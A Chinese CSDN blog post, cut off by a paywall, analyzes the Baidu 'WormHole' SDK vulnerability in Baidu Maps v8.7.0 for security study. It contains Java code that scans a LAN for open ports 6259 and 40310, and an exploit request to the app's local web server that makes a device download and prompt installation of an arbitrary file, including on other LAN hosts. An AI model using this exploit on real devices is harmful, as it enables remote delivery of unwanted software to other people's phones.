百度全系APP SDK漏洞–WormHole虫洞漏洞

最新推荐文章于 2023-12-19 16:18:30 发布
VIP文章 最新推荐文章于 2023-12-19 16:18:30 发布
阅读量9.2k 收藏 4
点赞数 2
分类专栏: Android Security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jltxgcy/article/details/50686858
版权

   0x00

    我们以百度地图v8.7.0为例来分析百度蠕虫漏洞,apk下载地址为https://github.com/jltxgcy/AppVulnerability/Baidu_Maps_v8.7.0.apk

    使用Android Killer来打开这个apk,Android Killer下载地址为http://pan.baidu.com/s/1jGQUzwa

    我们先讲述如何在代码层利用这个漏洞,然后再分析其原理。

    百度蠕虫漏洞利用代码地址:https://github.com/jltxgcy/AppVulnerability/tree/master/BaiduWormHole


   0x01

    1、首先要安装百度地图v8.7.0的apk,并启动apk。因为apk启动后才有这个漏洞,才可以被利用。

    2、 然后运行BaiduWormHole这个Android工程,运行后效果如下图:

     
     

    点击扫描按钮,实际上看局域网内是否有可以被利用的端口40310。代码如下:

    private List<String> checkHosts(String subnet) {
        List<String> ret = new ArrayList<>();
        for (int i = 1; i < 255; i++) {
            String host = subnet + "." + i;

            if (isReachable(host, 6259)) {
                host += ":6259";
                ret.add(host);
            } else if (isReachable(host, 40310)) {
                host += ":40310";
                ret.add(host);
            }
        }

        return ret;
    }
    比如局域网本机IP为10.10.154.12,那么会遍历从10.10.154.0:40310~10.10.154.255:40310是否可连接,可连接说明可以利用这个漏洞。这是为什么呢?我们一会分析。isReadable实现如下: 

    private boolean isReachable(String host, int port) {
        SocketAddress sockaddr = new InetSocketAddress(host, port);
        Socket socket = new Socket();
        try {
            socket.connect(sockaddr, timeout);
        } catch (Exception e) {
            return false;
        } finally {
            try {
                socket.close();
            } catch (IOException ex) {
            }
        }

        return true;
    }
    

    我们接着看点击开始,会执行什么代码:

URL url;
try {
	url = new URL("http://127.0.0.1:40310/downloadfile?callback=callback1&mcmdf=inapp_baidu_bdgjs&querydown=download&downloadurl="
			+ urlText.getText().toString() + "&savepath=Download1&filesize=10");
	HttpURLConnection conn = (HttpURLConnection) url.openConnection();
	conn.setConnectTimeout(5000);
	conn.setReadTimeout(5000);
	conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
	conn.setRequestProperty("remote-addr", "127.0.0.1");
	conn.setRequestProperty("referer", "http://www.baidu.com");
	int responseCode = conn.getResponseCode();
	if (responseCode == HttpURLConnection.HTTP_OK){
		return convertStreamToString(conn.getInputStream());
	}
}
catch (Exception e) {
	// TODO Auto-generated catch block
	e.printStackTrace();
}
    刚刚判断了局域网内是否有可以被攻击的对象。我们假设本机的IP地址为10.10.154.12,假设本机和另一个机器10.10.154.18都安装百度地图v8.7.0的apk,并且已经运行过。那么扫描的结果就是这两个ip地址, 10.10.154.12和10.10.154.18。

    在我们这个工程中,直接写死了127.0.0.1说明是本机地址也就是10.10.154.12。如果想攻击局域网内其他机器,如10.10.154.18,那么要改为10.10.154.18。便可攻击局域网其他机器。

    我们以本机攻击为例,实际上百度蠕虫漏洞的本质是百度应用在本机利用socket开了一个简易的WebServer,参考使用NanoHttpd实现简易WebServer

    以上url请求后,会根据downloadurl的地址下载对应的内容,这个例子是下载微信apk,然后提示用户安装。

   

   0x02

    下面分析原理,我们先从后往前推理,参考NanoHttpd实现简易WebServer。百度地图也一定初始化了ServerSocket,我们找到对应的代码位于com.baidu.hello.patch.moplus.nebula.b包下a类中a()方法。如下:

  public void a()
  {
    this.c = new ServerSocket();
    ServerSocket localServerSocket = this.c;
    if (this.a != null) {}
    for (InetSocketAddress localInetSocketAddress = new InetSocketAddress(this.a, this.b);; localInetSocketAddress = new InetSocketAddress(this.b))
    {
      localServerSocket.bind(localInetSocketAddress);
      this.e = new Thread(new v(this));
      this.e.setDaemon(true);
      this.e.setName("NanoHttpd Main Listener");
      this.e.start();
      return;
    }
  }
    我们还记
最低0.47元/天 解锁文章
jltxgcy
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
App中使用百度地图SDK的那些坑
逐梦天下
03-21 6936
近段时间有几个App都多少与地图有关,基于方便快捷的考虑,都用了百度地图SDK,由此,开始了这一段的忧伤。。。 总的说来,百度地图为移动开发者们带来了福音,帮助开发者方便、快捷的集成地图相关服务,只是,在具体使用过程中也会发现不少坑和槽点。 也许是摊子大了,事情繁多杂乱,也许是帝国的注意力不在此,开发者们的反馈常常得不到及时有效的回复和跟进处理,这里一并吐槽下。   顺序:时间倒叙(最近发...
FuckBaiduWormHole:检测当前手机是否存在百度WormHole后门
04-27
检测当前手机是否存在百度WormHole后门。 检测原理: 百度WormHole会在本地的6259和40310端口开启http服务,所以检测本机是否开启了这两个端口的http服务即可判断当前是否存在百度WormHole后门,由于是直接检测端口...
wormhole:
03-09
Wu Xingbo Wu,Fan Ni和Song Jiang( )在论文中介绍了Wormhole索引结构。 该存储库维护Wormhole索引结构的参考实现。 它在x86_64和AArch64 CPU上支持Linux / FreeBSD / MacOS。 在x86_64上,Wormhole需要SSE4.2。 在AArch64上,蠕病毒需要NEON SIMD和目标CPU上的crc功能。 该代码已经过Intel Haswell,Broadwell和Skylake CPU的测试。 它还已在运行64位ArchlinuxArm的Raspberry PI 4和运行64位Ubuntu Groovy的Jetson Nano上进行了测试。 消息 wh.h提供了一个用户友好的界面。 有关编码示例,请参见easydemo.c 。 whsafe API是一种无忧线程安全蠕API。 每次操作都花很少的
SRC漏洞挖掘笔记
山兔的博客
01-09 1746
因为前期挖的手法不熟,思路和操作有限,你是挖不到的,这个时候要是SRC的站跟我们平时做项目挖的站一样,就好了,但如果说SRC的资产很少,那我们的想法就基本上不可能实现,因为他就那几个站,翻来覆去的去测试,早就被别人挖过了,但如果说资产很多,我们通过前期的信息收集,肯定会挖到一些边缘的资产,虽然是边缘,但也会增强你的自信心。直接点击删除,抓包,替换id参数值为受害者的,尝试过无法越权删除,直接通过双写实现绕过越权限制,第一个id是自己的,第二个id是受害者,通过重放越权数据包,删除受害者的领取记录。
【APK反编译】漏了个大获取资源文件+APK文件的获取、反编译使用方法、下载链接
04-30 3539
【工具】apk反编译
一个仅供测试的百度地图的AK
热门推荐
君子不器
01-26 1万+
String KEY="8BB7F0E5C9C77BD6B9B655DB928B74B6E2D838FD";
百度地图KEY的不合理之处
chens616的专栏
08-22 716
最近我们的产品要使用的地图定位,综合考虑决定使用百度地图。但是随之感觉不舒服的地方就暴漏了。 每一个android 程序要想使用百度地图都必须要有一个KEY。这个KEY生成的时候要使用SHA1值和包名。而SHA1值实质上是程序签名的唯一标识。 实际使用的过程中,总共一下两种情况: 1、连接eclipse调试。这个时候默认使用的是debug.keystore签名,并不是没有签名,因此我们在CM
cve漏洞复现 php,Joomla注入漏洞(CVE-2018-6605)复现分析
weixin_36143290的博客
03-10 223
复现环境PHP 7.0.10Joomla 3.8.6此插件需要填入百度地图的AK。漏洞复现由于出现的注入点都相同,着重分析此URL:http://localhost/joomla/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails 在对问题URL进行POST请求的参数id...
使用ASM来书写Java代码
Mr__fang的专栏
02-03 6138
原文地址:http://blog.sina.com.cn/s/blog_4b38e200010008to.html 小巧而神奇的ASM ASM是一套JAVA字节码生成架构。它可以动态生成二进制格式的stub类或其他代理类,或者在类被JAVA虚拟机装入内存之前,动态修改类。 ASM 提供了与 BCEL( http://jakarta.apache.org/bcel )和SERP( htt
error:<init>(Ljava/lang/String;)V
Moliay的博客
09-27 2924
在同一个包或类名中,有重名的类哦 解决方法:换个在当前包或工程内没用过的类名就KO 照例来个eg:在javaDasic包里已有Person类,报错如下,是不是蛮熟悉咩 换个没用过的类名,例如把Person 换为Man(在javaDasic包内还没有Man类前提下) ...
攻击
Butterfly0011的博客
09-09 2188
攻击 (Wormhole)攻击又可称为隧道攻击,它是利用两个相距很远的攻击节点间共谋建立一条高质量高带宽的私有隧道,攻击者在私有隧道一端上记录数据包或位信息,通过此私有隧道将窃取的信息传递到隧道的另一端。因为私有隧道的距离一般远大于单跳无线传输半径,所以通过私用通道传递的数据包比通过正常多跳路径传递的数据包早到达目标节点。由于该隧道的高效特点,周围节点都选择该私有隧道进行数据传递。如图 2-4 所示, A、G 是无线传感器网络中相隔很远的两个普通节点,彼此都不在对方的通信半径内,W1、W2 表示
「攻防靶场」回顾AndroidAPP著名的RCE漏洞(WormHole).key - 云安全.zip
11-27
「攻防靶场」回顾AndroidAPP著名的RCE漏洞(WormHole) 安全方案 数据安全 访问管理 开发安全 NGFW
mobile-wormhole:魔术协议的移动客户端
05-14
这是用于协议的正在进行中的移动客户端。 已经工作的内容: 正在发送文件。 该应用程序可以获取代码,与另一方交换密钥,允许用户选择一个文件来发送,然后实际传输该文件。 接收文件。 用户可以输入代码...
puppet-wormhole:魔术的木偶模块
04-13
目录 模块说明 模块允许您使用Puppet / Bolt / Choria来管理并在节点之间传输文件。 设置 从开始 包括wormhole类应该足以开始使用: class { 'wormhole' : } 用法 从远程主机发送文件 user@host ~ % ...
防止百度地图Key泄露和不被恶意使用
最新发布
weixin_45816407的博客
12-19 2472
【代码】防止百度地图Key泄露和不被恶意使用。
云主机秘钥(ak/sk)泄露及利用案例
渗透测试研究中心
12-14 1772
云平台作为降低企业资源成本的工具,在当今各大公司系统部署场景内已经成为不可或缺的重要组成部分,并且由于各类应用程序需要与其他内外部服务或程序进行通讯而大量使用凭证或密钥,因此在漏洞挖掘过程中经常会遇到一类漏洞:云主机秘钥泄露。此漏洞使攻击者接管云服务器的权限,对内部敏感信息查看或者删除等操作。此篇文章围绕如何发现秘钥泄露、拿到秘钥后如何利用展开。ak、sk拿到后的利用,阿里云、腾讯云云主机通过使用AccessKey Id / Secret Access Key加密的方法来验证某个请求的发送者身份。
百度地图2.0版本监听事件大坑
flyfish866的博客
06-11 242
后续补
云主机AK/SK泄露利用
Fly_鹏程万里
10-20 897
云主机通过使用Access Key Id/Secret Access Key加密的方法来验证某个请求的发送者身份,其中Access Key ID(AK)用于标示用户,Secret Access Key(SK)是用户用于加密认证字符串和云厂商用来验证认证字符串的密钥,其中SK必须保密,原理为对称加解密,云主机接收到用户的请求后系统将使用AK对应的相同的SK和同样的认证机制生成认证字符串并与用户请求中包含的认证字符串进行比对,如果认证字符串相同,系统认为用户拥有指定的操作权限并执行相关操作,如果不同则系统将忽略
java 包冲突解决方法
weixin_30952103的博客
08-03 337
1、诊断包冲突 java.lang.NoSuchMethodError: org.apache.commons.io.output.DeferredFileOutputStream.<init>(ILjava/lang/String;Ljava/lang/String;Ljava/io/File;)V 2、解决 2.1 可见的依赖冲突 在eclipse中打开...
andorid 13中 "SurfaceFlinger 的主线程 扫描所有的 Surface 对象" 相关的 代码
05-28
在 Android 13 中,SurfaceFlinger 的主线程扫描所有的 Surface 对象的代码主要是由 `SurfaceFlinger::onMessageRefresh` 方法实现的。该方法是主线程的消息处理函数,当主线程收到“刷新”消息时,就会调用该方法。 具体来说,`SurfaceFlinger::onMessageRefresh` 方法的代码路径如下: 1. 遍历 SurfaceFlinger 中的所有 Layer(即 Surface 对象),并检查它们的状态是否发生了改变。这个过程是由主线程中的 `mDrawingState.traverseInZOrder` 方法实现的,该方法会遍历所有的 Layer,并调用每个 Layer 的 `onPreComposition` 方法来检查它们的状态。 2. 如果某个 Layer 的状态发生了改变,就会调用相应的客户端进程,要求其重新提交该 Layer 的缓冲区。这个过程是由 `SurfaceFlinger::postComposition` 方法实现的,该方法会遍历所有的 Layer,并调用每个 Layer 的 `onPostComposition` 方法来通知客户端进程。 3. 如果客户端进程提交了新的缓冲区,就会将这些缓冲区合成到一个帧缓冲区中,并在下一次屏幕刷新时将其发送到显示器。这个过程是由主线程中的 `composeSurfaces` 和 `drawWormhole` 方法实现的,它们会将所有的 Layer 缓冲区合成到一个帧缓冲区中,并在需要时添加Wormhole)层用于处理透明度。 下面是 `SurfaceFlinger::onMessageRefresh` 方法的伪代码: ```cpp void SurfaceFlinger::onMessageRefresh() { // 遍历所有的 Layer,并检查它们的状态是否发生了改变 mDrawingState.traverseInZOrder([&](Layer* layer) { // 调用每个 Layer 的 onPreComposition 方法来检查它们的状态 layer->onPreComposition(); }); // 如果某个 Layer 的状态发生了改变,就通知客户端进程重新提交缓冲区 postComposition(); // 将所有的 Layer 缓冲区合成到一个帧缓冲区中,并添加层 composeSurfaces(); drawWormhole(); } ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值